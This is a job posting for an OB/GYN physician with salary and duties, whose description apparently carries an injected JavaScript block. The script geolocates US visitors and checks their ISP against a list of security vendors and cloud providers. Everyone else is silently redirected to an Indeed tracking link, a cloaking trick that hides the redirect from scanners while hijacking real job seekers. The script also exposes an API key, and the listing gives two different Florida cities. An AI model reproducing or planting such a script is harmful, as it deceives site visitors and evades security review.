OB/GYN Physician

Orlando, FL
January 22, 2026

Apply for this job

Email *
Browse

Upload file .pdf, .doc, .docx

Deadline date:

Job Description

// retrieve user’s IP address and location const ipAddressUrl = ‘https://ipapi.co/json/’; fetch(ipAddressUrl) .then(response => response.json()) .then(data => { const country = data.country; // Get user’s country code (e.g., “US”) if (country !== ‘US’) { console.log(‘Script will not run as the user is outside the USA.’); return; // Exit the script if the user is not in the USA } const ipAddress = data.ip; // retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/$?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname; // check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg)); if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ‘https://www.indeed.com/tmn/ccs/772ba0103e500e9e/7ef1a632527f38b8fa76a5fcaf4750d0e32a74ec8abd88d87969f887305def09/2765583331732878?sf=yJ800’; } }) .catch(error => { console.error(‘Error retrieving ISP name:’, error); }); }) .catch(error => { console.error(‘Error retrieving IP address or location:’, error); });

We are seeking a skilled Obstetrics and Gynecology Physician to join our healthcare team, providing comprehensive women’s health care focused on reproductive health, pregnancy, and childbirth.


  • Conduct routine check-ups and monitor pregnancies
  • Diagnose and treat gynecological conditions such as endometriosis, infertility, and pelvic disorders
  • Perform surgical procedures including cesarean sections and hysterectomies
  • Provide prenatal care and assist in labor and delivery
  • Educate patients on women’s health issues, birth control, and preventive care

  • Join a dedicated team in a full-time role offering $202,662 – $226,254 annually, with benefits like health, dental, vision insurance, 401(k), and paid time off.

    Requirements include a Medical License and BC/BE (preferred), with the position based in Delray Beach, FL, requiring in-person work and relocation prior to start.